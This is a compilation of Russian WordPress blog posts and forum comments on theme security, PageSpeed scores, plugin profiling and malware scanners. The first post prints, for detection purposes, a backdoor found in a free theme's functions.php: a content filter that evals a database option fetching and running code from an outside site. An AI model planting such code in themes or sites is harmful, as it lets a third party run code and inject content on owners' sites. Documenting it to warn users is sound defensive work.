Привет друзья. Вы уверены, что бесплатный шаблон WordPress, который вы используете для своих сайтов и блогов действительно безопасный и не содержит скрытых угроз и вредоносного кода? Вы полностью в этом уверены? Абсолютно?)

Думаете, прогнали шаблон через , удалили из него скрытые ссылки, и дело сделано. Файлы сайта сканируете периодически антивирусом, заглядываете в инструменты вебмастера Яндекса во вкладку Безопасность и с облегчением видите там сообщение: «Вредоносный код на сайте не обнаружен «.

Вот и я так думал. Не хотел бы вас расстраивать, но…

Скрытый опасный код в бесплатных шаблонах WordPress

Вот такое письмо я получил на прошлой неделе на почту от своего хостинга. С недавних пор они ввели регулярную проверку всех файлов сайта на поиск вредоносного содержания и таки они это содержание у меня обнаружили!

Началось все с того, что я зашел как-то днем на свой сайт и не смог его запустить — вылезала ругательная надпись про не найденные файлы с расширением php. Немного напрягшись пошел изучать содержимое папки с сайтом на хостинге и сразу же обнаружил проблему — мой файл шаблона fuctions.php был переименован в functions.php.malware что как бы неоднозначно намекало — здесь поработал антивирус или что-то вроде этого) Зайдя на почту я и обнаружил вышеупомянутый отчет от хостера.

Первым делом я конечно же начал проверять данный файл, изучал его содержимое, сканировал всевозможными антивирусами, десятками онлайн сервисов по проверке на вирусы и т.д. — в итоге ничего не обнаружил, все в один голос утверждали что файл совершенно безопасный. Я разумеется выразил свои сомнения хостеру, мол вы чего-то напутали, но на всякий случай попросил их предоставить отчет об обнаружении вредоносного куска кода.

И вот что они мне ответили

Пошел гуглить инфу о данном коде и серьезно задумался…

Как найти фрагмент вредоносного кода в шаблоне

Как оказалось, это действительно нетривиальный прием, который позволяет заинтересованным лицам передавать данные на ваш сайт и изменять содержимое страниц без вашего ведома! Если вы используете бесплатный шаблон, то настоятельно рекомендую проверить свой functions.php на наличие следующего кода :

add_filter(‘the_content’, ‘_bloginfo’, 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){
return $co;
} else return $content;
}

Даже с моими весьма неглубокими познаниями в php видно, что создается некий фильтр, привязываемый к глобальной переменной post и content отвечающие за вывод контента только на страницах записей блога (условие is_single). Уже подозрительно не так ли? Ну а теперь посмотрим что же такого собирается выводить данный код у нас на сайте.

Интересная опция blogoption запрашиваемая в базе данных так же выглядит весьма подозрительной. Заходим в нашу базу данных MySQL и находим там таблицу под названием wp_options, если вы не меняли префиксы то она так будет выглядеть по умолчанию. И в ней находим заинтересовавшую нас строку под названием blogoption

Какая красота! Мы видим следующую опцию

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Т.е. нам с некого сайта (причем русского заметьте) возвращают содержимое, которое может нести в себе все что угодно! Любое количество ссылок, вредоносные коды, измененный текст и т.д. Сам сайт при заходе на него выдает 403 ошибку доступа, что не удивительно. Разумеется данную опцию я тоже удалил из БД.

По информации от пострадавших обычно возвращается точно такое содержимое вашей статьи с одной лишь модификацией — вместо какой-либо точки «.» в текст маскировалась открытая ссылка! И кстати, данная опция записывается в базу данных при установке самого шаблона, а затем код, который это делает благополучно самоуничтожается. И вот с такой дрянью я жил два года, и ни один антивирус или сервис мне так и не выявил данную угрозу за все то время. Честно говоря я не замечал, срабатывал ли когда-нибудь со мной такой прием, или же эту возможность блокировал мой плагин безопасности (а может одно из обновлений WordPressa закрыло эту дыру), но все равно неприятно.

Мораль про бесплатный сыр

Как вам изощренность наших «переводчиков» шаблонов (или тех кто выкладывает их у себя в каталогах)? Это вам не ссылки из футера выпиливать) Жалко я уже не помню, откуда я скачивал свой шаблон, давно это было, а то бы обязательно пару ласковых написал. И если бы на тот момент обладал тем же опытом, что имею сейчас, то однозначно не пользовался бы бесплатным шаблоном, или на крайний случай не качал бы с неизвестных источников!

Проще купить какой-нибудь официальный премиум шаблон за 15-20 баксов на том же и жить спокойно, зная что в нем нет дырок и зашифрованных ссылок, а если даже и найдутся уязвимости, то разработчики обязательно выпустят обновление, в котором эти дырки закроют. (У Артема кстати недавно вышла статья, где он как раз про премиум шаблоны рассказывает и даже раздает промокоды на зверские скидки, кому интересно )

• А на гуглофейкер даже не тратьте время.

  гугловский инструмент, при всех его недостатках, умеет то, что остальные не умеют — например, определить, что картинки на сайте выводятся не в своем размере. это когда в виде миниатюрки 100×100 выводится картинка 1000×1000, ужатая браузером до 100×100.

  я буквально на днях чинил кривую тему клиента именно по этому поводу. там в сайдбаре выводились миниатюрки 110×82 — но картинки туда запихивались оригинальные, полноразмерные.

  плюс ко всему — какой еще инструмент покажет вам, что ваши картинки сильно не оптимизированные? когда png файл можно без потери качества ужать с 500kb до 45kb — это весьма важная информация.

  ну вот зачем вы опять ерунду советуете?

  а теперь покажите мне, каким другим инструментом можно определить такие очевидные косяки сайта?

  
  
  

  https://i.imgur.com/tOZcemv.jpg
  https://i.imgur.com/fEarWYT.jpg
  и тд.. Надеюсь, достаточно.

  Flector , Если бы Вы пользовались нормальными инструментами (а не потребляли разные гуглофейки) — этих бы вопросов просто не было бы.
  Все выше указанные дают информации на 3 порядка выше и полезней чем этот гуглофейк. Реально нужной и полезной инфы.

  Все выше указанные дают информации на 3 порядка выше и полезней чем этот гуглофейк. Реально нужной и полезной инфы.

  мне не нравится инструмент от гугла хотя бы тем, что его собственные сервисы им не руководствуются. но очевидные вещи вроде картинок он показывает идеально. ну там еще gzip, браузерное кэширование и тд — то есть самое очевидное.

  и я предпочитаю смотреть именно гугл, так как только его оценка и важна. какая разница, что будут показывать посторонние сервисы, если гугл все равно будет руководствоваться своей собственной оценкой?

  Проверьте свой, где картинки неправильно вставленные. Какие проблемы-то?
  Мне с трудом удалось отыскать что-то подобное, чтобы скрины снять.

  так как только его оценка и важна.

  Кому важна? Только не говорите что гуглу 🙂

  А да, оценка. получить 100/100 — нет никаких проблем. Но вот для сайта это катастрофа.
  
  

  А да, оценка. получить 100/100 - нет никаких проблем. Но вот для сайта это катастрофа.

  ну подсунули вы гуглу 503 ошибку, в чем смысл то?
  это же не решение проблемы.

  и да — оценка гуглу важна.
  не знаю насколько, они такие цифры не раскрывают — но было бы глупо делать сервис, от которого ничего не зависит, не так ли?

  PS да и даже, если гуглу плевать на свою собственную оценку — это же в первую очередь надо для самого вебмастера, а не для гугла. если у вебмастера не включен gzip, браузерное кэширование и картинки не в своем размере — это надо исправлять.

  и незачем исправлять то, что гугл не считает важным (это я про оценки других сервисов) — просто пустая трата времени будет.

  и да - оценка гуглу важна.

  Научитесь всё же анализировать выдачу.

  но было бы глупо делать сервис, от которого ничего не зависит, не так ли?

  Я Вам открою страшную тайну — гуглосервисы (и не только гугло) давно делаются не для людей. Сколько сервисов того же гугла кануло в лету? Сколько реально полезного было, а потом исчезло? Давно прошли времена, когда гугл что-то делал для людей. Бигдата, да.

  это же в первую очередь надо для самого вебмастера,

  Для вебмастера есть дейсвительно полезные и нужные вещи. А на разный хлам нечего тратить время. (если Вы не заметили — они и гуглопопугаев тоже показывают)

  какая волшебная отмазка — научитесь анализировать выдачу.
  

  ок — я вам также отвечу — научитесь анализировать выдачу. при всех прочих равных (абсолютно одинаковые факторы ранжирования — от ссылок до ПФ) первым в выдаче будет сайт с наибольшей оценкой от гугла.

  не верите? ну ваше право.
  протестировать подобное все равно не получится — равных сайтов не существует.

  это в любом случае неважно — потому что оптимизация делается не столько для гугла, сколько для своих собственных посетителей. как с теми же картинками, когда вебмастер вставляет в качестве миниатюры 5Mb картинку.

  в чем смысл то?

  В «важности» гуглопопугаев.

  какая волшебная отмазка - научитесь анализировать выдачу.
  прям аргумент на все случаи жизни.

  Если Вы что-то заявляет про ПС, именно выдача — это единственно верное доказательство.

  протестировать подобное все равно не получится - равных сайтов не существует.

  Причем тут разные? Вы даже у сайтов из выдачи не можете проверить гуглопопугаи? Там и 50 и даже 30 вполне себе в ТОП10 сидят.

  он всего лишь один из тысяч факторов ранжирования. поэтому я и говорил про «равные» (не разные) сайты — только в этом случае можно убедиться в том, что гуглопопугаи работают.

  у фейсбука может быть оценка «0» по гуглопопугаям — но он все равно будет ТОП1 по запросу «фейсбук». это как бы очевидно.

  Google PageSpeed Insights имеет только один плюс — отдельный анализ выдачи для декстопа и мобильных, в остальном он плох тем же, чем и вечно недовольная сварливая жена 😀 Занижает оценку, придирается к тому, что невозможно исправить (ресурсы с других доменов, включая те же гуглы)
  Аналогов ему полно, проблемы сайта-конфигурации анализируют очень многие сервисы,
  я специально не дала ссылку в начале темы на Pingdom например, мне больше нравится Webpagetest, разница только в виде, как подается результат, и субъективном удобстве.
  Плохо пожатые картинки тоже многие находят, вопрос только в том, скинуть 10 попугаев и выдать что — картинки у вас на сайте совсем не оптимизированы из за 1 байта разницы…
  Взять тот же GTMetrix , там есть оценка по PageSpeed алгоритму и Yslow,
  причем сайт имеющий 95% PageSpeed может на Insights быть «дном» неоптимизированным, это действительно их проблема и они делают этим проблемы другим, особенно тем, кто не может анализировать смысл оценок и результаты.
  Сайт хороший, оптимизированый, а на G PS I — «ой все плохо»

  а вы правда считаете, что эти самые «гуглопопугаи» это самый важный на свете фактор ранжирования?

  Я считаю, что это попугаи. Никаких полезных данных они не дают. А к скорости загрузки вообще никаким боком (какой-такой pagespeed? С самого названия сервиса — фейк). Скорость измеряется не в гуглопопугаях, а в бит/сек.
  Что же до ранжирования — если сайты в ТОП10 имеет 30гуглопопугаев, то какой от них смысл вообще?
  Вот как-то так.

  только в этом случае можно убедиться в том, что гуглопопугаи работают.

  Работают НЕ попугаи, а все факторы. 90% из которых в этом гулофейке нет, а 90% из того что есть — бред сивой кобылы.
  Единственная польза от него для ламерв — можно скачать оптимизированную графику. Но только графику, а не стили и скрипты.

• Тема «Проверка сайта на ошибки» закрыта для новых ответов.

Вы узнаете, как проверить нагрузку установленных на сайт WordPress . С помощью этого способа, можно определить, какой именно плагин дает большую нагрузку на сайт, после чего этот плагин можно удалить, либо заменить каким-то другим.

Был у меня случай, когда один плагин давал большую нагрузку на сервер, что и блог переставал работать. Мне хостер выслал письмо с предупреждением, чтобы я позаботился о снижении нагрузки, и как бы невзначай предложил перейти на более дорогой тариф, который с этой нагрузкой легко справится. На тот момент у меня был хостинг «Sprithost ». Ох, и намучился я на этом хостинге.

Я написал в службу поддержки «Sprithost », чтобы мне помогли решить эту проблему. Мне посоветовали установить «WP Super Cache ». Да, нагрузка на сервер действительно уменьшилась, но этого было не достаточно. Блог иногда все равно был не доступен. Проблему эту я решил достаточно просто. Я перешел на другой хостинг, после чего все нагрузки исчезли.

Итак, перейдем к делу. Как бы это парадоксально не звучало, но проверять нагрузку плагинов, мы будем с помощью плагина «».

Плагин «P3 - Plugin Performance Profiler» - проверка нагрузки плагинов на сайт WordPress

Скачать плагин можно по этой ссылке . После установки и активации плагина, можно кликнуть по ссылке «Scan Now », которая находится под названием самого плагина, или перейти в «Инструменты », а потом нажать «P3 Plugin Profiler ».

Теперь Вы можете сделать сканирование всех установленных плагинов на Вашем сайте. Жмите «Start Scan ». Появится окошко, где Вы можете выбрать автоматическое сканирование (Auto Scan ), или ручное сканирование (Manual Scan ). В поле «Scan name », можно дать название этому сканированию, например, написать дату.

Если выбрать автоматическое сканирование (Auto Scan ), тогда плагин «P3 - Plugin Performance Profiler » будет автоматически сканировать определенные страницы и папки на сайте. По какому принципу он сканирует - тяжело сказать, но ждать мне приходится около 10 минут. Готовый результат, можно посмотреть, если нажать кнопу «View Results ». Появится такой график:

График разбит на части разного цвета. Каждый цвет относится к определенному плагину, например, синий цвет к плагин «WPtouch Mobile Plugin ». У Вас этот цвет может относиться совершенно к другому плагину.

Правее от графика, можно посмотреть, какой цвет к какому плагину относится. Также, если подвести курсор мыши на сам график, к определенному цвету, то Вы тоже увидите, к какому плагину относится цвет.

В моем случае, наибольшую нагрузку дает плагин «Pretty Link Lite », о котором я недавно писал. Можете почитать « »

В режиме ручного сканирования, можно отсканировать любую страницу сайте. Нажмите «Start Scan », а потом «Manual Scan ». Кликните по странице, которую собираетесь отсканировать, а потом внизу нажмите «I"m Done ».

Готовые результаты можно отправить на свой E-mail , для этого надо кликнуть внизу по ссылке «Email these results ».

Выше над графиком можно посмотреть количество установленных плагинов на Вашем сайте, время загрузки плагина, время загрузки страницы и запросы к базе данных MySQL. Там же можно посмотреть историю сканирования (History ), и получить помощь (Help ).

____________________________
К уроку 198.

Один из важнейших этапов при создании блога – выбор качественного шаблона. Существует много сайтов, как платно, так и бесплатно. Однако здесь надо соблюдать осторожность, так как велика вероятность вместе с файлом получить вирусы, вредоносные скрипты и скрытые ссылки.

Но даже, если шаблон чист в плане безопасности, а его дизайн, юзабилити и функционал вас полностью устраивают – это не значит, что все в порядке. Тема должна иметь валидный HTML и CSS код, а также соответствовать всем стандартам CMS WordPress. С последним есть проблемы даже у платных тем и шаблонов, сделанных на заказ.

Разработчики движка постоянно развивают его, а авторы шаблонов не всегда поспевают за ними, используя устаревшие функции при их создании.

Сегодня я покажу 2 способа проверки тем WordPress на соответствие стандартам. Эти инструменты используются при их добавлении в официальный каталог https://wordpress.org/themes/

Сервис проверки тем WordPress и шаблонов Joomla на соответствие стандартам

ThemeCheck.org – это бесплатный сервис, который позволяет проверить безопасность и качество шаблонов для CMS WordPress и Joomla перед установкой на сайт.

Для проверки темы, загрузите ее архив с вашего компьютера, нажав кнопку “Select file ” на сайте themecheck.org . Если не хотите, чтобы результаты проверки сохранялись на сервисе и были доступны другим пользователям, установите галочку “Forget uploaded data after results “. Теперь жмите кнопку “Submit “.

Для примера я взял тему Interface , которую скачал на официальном сайте. 99 из 100 – 0 критических ошибок и 1 предупреждение. Это очень хороший результат.

Для сравнения, шаблон моего блога получил оценку 0 (14 ошибок и 23 предупреждения). Думаю, что у многих результаты не особо будут отличаться, особенно если темы уже устарели. Все замечания с пояснениями, указанием файлов и строк, где они обнаружены, расположены на этой же странице ниже.

Признаться, я там мало что понял, это скорее будет полезно для авторов, а мне проще сменить шаблон, чем все исправлять. Не знаю только, когда я решусь на это.

На Главной есть большой выбор ранее проверенных веб-тем WordPress и Joomla с возможностью сортировки по времени добавления или оценке. При клике по ним можно увидеть подробную информацию и ссылки на сайт автора и страницу для скачивания.

Если вы разработчик и ваша тема валидна на 100%, можете сообщить об этом пользователям, установив на ней специальный значок с оценкой.

Ценность сервиса ThemeCheck.org в том, что любой вебмастер может с его помощью выбрать качественную тему еще до ее установки на блог.

Плагин Theme Check

Проверить уже установленный шаблон на совместимость с последними стандартами Вордпресс, можно с помощью плагина Theme Check . Ссылка на скачивание последней версии: https://wordpress.org/plugins/theme-check/

Функционал плагина аналогичен сервису, о котором я рассказал выше. Никаких настроек после стандартной установки и активации производить не надо. Порядок проверки:

1. Перейдите в админке на страницу меню “Внешний вид ” – “Theme Check “.
2. Выберите из выпадающего списка нужную тему, если их установлено несколько.
3. Установите галочку “Suppress INFO “, если не хотите отправлять информацию.
4. Нажмите кнопку “Check it “.

Результаты будут показаны на этой же странице.

Как видите, стандартная тема Twenty Ten тоже не идеальна, а вот, например, Twenty Fourteen ошибок не имеет.

После проверки плагин можно отключить, а лучше вообще удалить до следующего раза.

Вывод. Перед установкой нового шаблона WordPress проверяйте его не только на наличие скрытых ссылок и вредоносного кода плагином TAC, но и с помощью сервиса ThemeCheck.org или плагина Theme Check на соответствие последним стандартам CMS.

P.S. Недавно просматривая TopSape Reader, увидел новый SEO-блог zenpr.ru , который держит 1 место среди блоггеров по переходам за месяц. Если учесть, что его возраст чуть более месяца, то результат достоин уважения. Дизайн в стиле минимализма, если не сказать, что его вообще нет, но пишет автор – зачитаешься. Все по делу и без воды. Точно как в заголовке блога – «ноль лишних символов». Рекомендую почитать, найдете много полезной информации.

Часто наши пользователи задают вопрос, существует ли способ проверить свой сайт на WordPress на наличие потенциально опасного кода. Ответ на этот вопрос: ДА, ДА и еще раз ДА. Существуют как платные так и бесплатные инструменты для сканирования вашего сайта WordPress на наличие потенциально опасного или нежелательного кода. Всегда полезно делать регулярные проверки вашего сайта путем сканирования на вредоносный код. В этой статье мы покажем вам несколько способов сканирования ваш сайт на WordPress на потенциально опасный код.

Theme Authenticity Checker (TAC)

Theme Authenticity Checker — это бесплатный плагин, который проверит все ваши темы WordPress на наличие потенциально опасного или нежелательного кода.

Часто взломщики ставят целью взлом именно тем с целью внедрения туда ссылок, поэтому плагин — это замечательный способ проверки на их наличие.

Exploit Scanner

Exploit Scanner — другой бесплатный плагин WordPress, более мощный нежели Theme Authenticity Checker, так как позволяет осуществлять поиск вредоносного кода по всем файлам и базе данных вашей копии WordPress. Он ищет сигнатуры, соответствующие вредоносному коду и выявляет их.
Примечание: возможно определенное количество ложных срабатываний, поэтому необходимо понимать что вы делаете, и определить действительно ли это вредонос или же всё в порядке.

Sucuri

Sucuri — один из САМЫХ лучших сканеров безопасности для WordPress вообще. У них есть простой бесплатный сканер сайтов, который проверяет ваш ресурс на предмет все ли с ним в порядке. Однако платная версия намного превосходит фри по своим возможностям. Вкратце, после того, как вы установите Sucuri, он автоматически мониторит ваш сайт 24 часа в сутки 7 дней в неделю на предмет вредоносных скриптов. Он проводит аудит активности на всем сайте, чтобы вовремя сообщить, если что-либо пойдет не так. Если что-то кажется подозрительным, Sucuri блокирует IP. Также плагин отправляет вам уведомление, если на сайте начинается какая-то подозрительная активность. И, наконец, плагин предлагает чистку от вредоносного кода, и эта услуга включена в цену сервиса (вне зависимости от того, большой ваш сайт или маленький).

Для наших проектов мы выбрали тариф для 5 сайтов, что обходится около $3 за сайт в месяц. Имеет смысл заплатить $3 в месяц и не беспокоится о безопасности сайта.

Кстати, сервис не только для новичков. Большие издательства типа CNN, USAToday, PC World, TechCrunch, TheNextWeb и другие пользуются услугами Sucuri. Эти парни знают, что делают, и поэтому люди доверяют им свои сайты.

По всем вопросам и отзывам просьба писать в комментарии ниже.

Не забывайте, по возможности, оценивать понравившиеся записи количеством звездочек на ваше усмотрение.